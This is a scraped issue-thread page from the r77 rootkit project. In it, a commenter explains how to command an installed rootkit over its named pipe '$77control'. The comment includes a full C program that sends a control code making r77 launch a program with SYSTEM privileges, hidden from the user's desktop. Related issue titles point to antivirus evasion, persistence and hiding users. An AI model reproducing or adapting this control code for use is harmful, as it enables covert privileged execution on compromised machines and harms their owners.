Comments (2)
There's no need to modify r77 itself to achieve that. Once r77 is installed & running, you can communicate with the rootkit service through a named pipe. When you send CONTROL_USER_SHELLEXEC
, r77 executes a file with SYSTEM privileges fo you - and that executable should delete those files, etc.
There are more control codes, see the documentation for an exhaustive list. Here is an example of how to use one particular control code.
Look at the example in ControlPipe.cpp
#include <Windows.h>
// This example demonstrates how to make r77 perform a ShellExecute.
// All other control codes work similarly.
#define CONTROL_USER_SHELLEXEC 0x3001 // These constants can be found in r77def.h or in the technical documentation
int main()
{
// Connect to the r77 service. The rootkit must be installed.
HANDLE pipe = CreateFileW(L"\\\\.\\pipe\\$77control", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
if (pipe != INVALID_HANDLE_VALUE)
{
DWORD controlCode = CONTROL_USER_SHELLEXEC;
WCHAR shellExecPath[] = L"C:\\Windows\\System32\\notepad.exe";
WCHAR shellExecCommandline[] = L"mytextfile.txt";
// Write control code (DWORD)
DWORD bytesWritten;
WriteFile(pipe, &controlCode, sizeof(DWORD), &bytesWritten, NULL);
// Write the path for ShellExec (unicode string including null terminator)
WriteFile(pipe, shellExecPath, (lstrlenW(shellExecPath) + 1) * 2, &bytesWritten, NULL);
// Write arguments for ShellExec
WriteFile(pipe, shellExecCommandline, (lstrlenW(shellExecCommandline) + 1) * 2, &bytesWritten, NULL);
// Now, a new process "notepad.exe mytextfile.txt" will spawn.
// You will only see it in TaskMgr. Because this process is running under the SYSTEM user, it does not show up on the desktop.
// Use the Test Console to try out different control codes.
CloseHandle(pipe);
}
return 0;
}
from r77-rootkit.
Closed due to inactivity.
from r77-rootkit.
Related Issues (20)
- Teaching lessons HOT 5
- Contact information HOT 1
- "MSB3073" Error HOT 4
- r77 rookit injects into PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON process
- Adding a .exe to startup HOT 6
- Help HOT 4
- ControlPipe using Powershell HOT 3
- Help Needed - Happy to pay consulting fees HOT 1
- Help HOT 3
- testconsole won't work HOT 5
- Hiding users (net.exe and lusrmgr.msc) HOT 11
- I discovered new rootkit vulnerability stronger than your rootkit with 0 coding (no admin required) HOT 11
- Issue with BitDefender Partial Detection of r77 and Loss of Persistence HOT 4
- Significant challenge with BitDefender AV (BD) that affects the operation of admin-level processes HOT 2
- #//~~ Long time without talk! ^- ^ [ HELP ] HOT 11
- Install.shellcode HOT 3
- r77 pipes HOT 8
- where to start ?
- [ HELP ] — How I can use the ControlPipe in C# ?? 🥴 HOT 4
- Add Support for The Use of WildCard Characters HOT 7
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from r77-rootkit.